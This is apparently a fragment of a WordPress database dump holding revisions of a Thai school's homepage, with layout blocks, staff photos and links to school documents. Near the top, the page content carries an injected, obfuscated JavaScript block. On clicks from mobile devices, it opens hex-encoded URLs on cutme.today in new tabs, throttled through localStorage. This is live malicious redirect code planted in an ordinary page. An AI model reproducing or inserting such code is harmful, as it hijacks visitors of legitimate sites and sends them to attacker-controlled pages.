{\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:42:19','2025-06-27 08:42:19','',19,'http://watprato.ssk.in.th/?p=587',0,'revision','',0),
(588,1,'2025-06-27 15:49:22','2025-06-27 08:49:22','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_ed3ec7-1c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_ed3ec7-1c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-538\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group 